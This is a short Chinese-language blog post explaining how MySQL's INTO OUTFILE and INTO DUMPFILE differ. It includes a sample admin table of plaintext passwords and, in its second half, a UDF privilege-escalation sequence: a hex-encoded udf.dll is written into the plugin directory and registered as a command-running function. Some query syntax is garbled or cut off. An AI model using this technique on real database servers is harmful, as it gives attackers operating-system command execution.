共计 1513 个字符,预计需要花费 4 分钟才能阅读完成。
这篇文章将为大家详细讲解有关 mysql 中 dumpfile 与 outfile 函数的区别是什么,文章内容质量较高,因此丸趣 TV 小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
如下表 admin
mysql select * from admin;
+—–+———–+———+
| uid | name | pass |
+—-+————+———+
| 1 | admin | baidusb |
| 2 | root | hacksb |
| 3 | manage | nimei |
| 4 | boss | helensb |
| 5 | guanli | admin |
| 6 | superuser | G0Ood |
+—-+————+———+
mysql select * from admin into outfile /home/seclab/test/test1.txt
Query OK,1 row affected (0.00 sec)
我是想将这些内容 导出到 一个 txt 文件, 事实上是可以完整导出每行记录的.
这个很适合导库
而 into dump 是不行的 它只能导出 一行数据!
若我们想把一个 可执行 2 进制 文件用 into outfile 函数导出
事实上 导出后 就会被破坏
因为 into outfile 函数 会 在行末端写入新行 更致命的 是会转义 换行符
这样的话这个 2 进制可执行 文件 就会被破坏
这时候我们用 into dumpfile 就能导出 一个完整能执行的 2 进制 文件
into dumpfile 函数不对任何列或行进行终止,也不执行任何转义处理
如在无 web 脚本 执行 但是有 mysql root 执行的环境下 我们就可以 通过
into dump 函数导入 udf.dll 进行提权
mysql show variable like %plugin%
+—————-+——————————————+
|Variable_name | Value |
+—————-+——————————————+
| plugin_dir |c:\mysql\mysql server 5.1\lib/plugin |
+—————-+——————————————+
mysql select unhex(udf.dll hex code) into dumpfile c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll
mysql select * from func; #查看是否有人创建过 udf 如果有就可以省略
mysql create function MyCmd returns string soname c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll
mysql select MyCmd(whoam
一点小知识点:
如何获取该 udf.dll 文件的 16 进制值 (hex)?
我们可以本地搭建 mysql 环境 找个可以用的 udf.dll 文件 执行下面操作
mysql select hex(load_file ( c://temp/xxoo.dll)) into outfile c:/windows/temp/xxoo.txt
关于 mysql 中 dumpfile 与 outfile 函数的区别是什么就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
![Frank#smith[Kfyzeiuqujbpygze,2,5]](https://cravatar.cn/avatar/ebd2642d86a4b40100d29dc76ec89b0d?s=96&d=monsterid&r=r)
